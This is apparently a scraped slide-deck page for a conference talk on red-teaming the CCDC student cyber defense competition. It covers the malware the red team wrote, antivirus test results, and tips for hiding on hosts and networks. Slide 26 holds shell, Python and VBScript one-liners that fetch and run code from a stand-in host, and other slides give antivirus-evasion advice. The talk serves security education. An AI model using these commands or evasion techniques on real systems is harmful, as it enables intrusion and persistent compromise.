Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 

Dernier (20)

🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 

Red teaming the CCDC

  • 1. Red Teaming the CCDC: hacking the most paranoid student system administrators in the nation. Matt “scriptjunkie” Weeks
  • 2. Some funny things: our mistakes and yours
  • 3. No, don’t start “aCcbsXoAIfRsU”
  • 4. Those other people logged-in are not your friends.
  • 5. You planned to get hacked?
  • 14. A year of curating red team wallpaper
  • 16. Gotta keep up with changing memes
  • 17. The red team has you
  • 22. The malware games: challenges writing malware
  • 23. Requirements
      Full-featured RAT
        File access
        Interactive shell
        Screenshots, keylogger
        May include stealth features
      Basic backdoors
        Used for re-establishing full-featured RAT
        Simple command and/or shellcode execution
        Callback or listening
      Keylogger/persistent monitoring
      File packing tools
      Worms – every method possible
  • 24. Compatibility is hard
      Windows XP – Win 8.1: hook-based keylogging fails…
      *NIX’s make Windows look great: no two Linux distros start up the same
      OS X(!), NetBSD, OpenBSD, FreeBSD, OpenIndiana (Solaris), Ubuntu, Fedora, Linux Mint; x64/x86
  • 25. But hard work pays off, kids
  • 26. On-the-fly backdoors
      Usually you are caught off-guard with at least one system
      Webshell collections are your friend
      Scripting skills are a must
        while [ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done
        eval(urllib2.urlopen('http://a.bc/def').read())
        echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
  • 27. First world red team problems: I accidentally six or seven keylogger copies
  • 29. Process: write malware; does AV detect? Yes: look for shady code, obfuscate functions and strings. No: done!
  • 31. AV test lab
      Top market share AV’s (Internet Security Suite version) on default settings
      7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)
  • 33. Test 1: Widely known malware with 1 byte appended
      The only way to fail is by using giant hash lists instead of real signatures
      Results per product, in slide order: FAIL WIN FAIL WIN FAIL FAIL FAIL FAIL WIN WIN WIN WIN
  • 34. Test 2: Malware with public code samples
      Results per product, in slide order: FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL
  • 35. Test 3: One-off malware with no evasions
      Results per product, in slide order: FAIL FAIL FAIL FAIL FAIL FAIL INDECISIVE FAIL WIN WIN WIN INDECISIVE
  • 36. Test 4: “Chris’s Ex-Girlfriend” – Highly evasive malware workhorse
      Results per product, in slide order: FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL
  • 37. Test 5: “The Kraken” – Sneaky firewall-evading malware
      Results per product, in slide order: FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL WIN
  • 38. Test 6: Worm with no evasions
      Results per product, in slide order: FAIL FAIL FAIL FAIL FAIL FAIL WIN WIN FAIL Hosed VM FAIL FAIL
  • 39. Test 7: Legit program used maliciously
      Results per product, in slide order: FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL INDECISIVE
  • 40. Notes
      Symantec was only AV to detect reverse meterpreter on the wire
      Kaspersky’s behavioral emulation detected one worm well
      Kaspersky and Comodo both recognized at least one piece of malware as unusual (not on whitelist) but not necessarily bad
      Trend Micro was only AV to block hash dumping
      Panda, Avast gave errors installing and were not tested
  • 41. Final standings
      Results per product, in slide order: 100% FAIL, meh, 100% FAIL, TIED 1st, 100% FAIL, 100% FAIL, FAIL, FAIL, meh, TIED 1st, 3rd, meh
  • 42. Just kidding. After 2 hours obfuscating, these are the real final standings:
      FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL
  • 43. How do I bypass AV?
      Write your own stuff
      Dynamically resolve API calls
      Obfuscate strings
      Introduce environmental/system dependencies to generically thwart sandboxing
      Write your own stuff
      Impersonate legitimate software
      Watch what hits disk
      Digitally sign your stuff if you can
      Write your own stuff
  • 44. Security Software Lessons
      Some AV’s are a total fail
        MalwareBytes Pro is in this list with MS, McAfee, F-Secure
      Many have one really cool feature or heuristic
        Kaspersky, Symantec, Trend Micro
      All can be bypassed easily for most malware
        Only detection remaining after 2 hours was one worm vs Kaspersky
  • 45. Hiding from the students
  • 46. Hiding from the students
      Host hiding
        Hide while running
        Hide start
      Meterpreter is great for functionality, bad for persistence
      Mostly custom malware
      Mostly standard persistence methods
      Don’t run in your own process
      Don’t use any of those toy languages with dependencies
      Use C!
  • 47. Don’t hide stuff rootkit finders look for
  • 48. Don’t sweat the one-offs
  • 49. Hiding on the wires
      Hiding from Wireshark
        Harder than hiding on host
        Try to blend in with normal traffic
        Throw Wireshark crashers
        Remove packets from view
      Hiding from netstat/tcpview
        Using HTTP(S) instead of TCP callbacks doesn’t leave connection open
        If that fails, blend in by using common ports and cloud IP’s
        Migrate session to web browser or critical process
  • 50. Hiding on the wires
      Use every protocol that gets out: TCP, UDP, HTTPS, DNS
      Use hop points in cloud/web hosting
      Use file sharing/paste/social media sites
      Random callback selection and delays to avoid monitors
      Any way students can send or receive info, you can too
  • 51. Dealing with firewalls
      Two types: host, network
      Host firewalls
        Usually don’t stop outbound traffic
        Can go underneath, watch raw packets
        Frequently add exceptions or drop the firewall
  • 52. Network firewalls
      Great to own
      Tough if you don’t
      Use service ports since they must be able to reach the hosts
  • 53. Defenses that hurt
      Patch or block RCE’s
      Strict inbound and outbound network firewall rules
      Traffic monitoring
      Different passwords on all the boxes
      Pull the plug
      Reverting (sometimes)
      Realizing that sometimes, the red team can’t hurt you as much as finishing injects helps you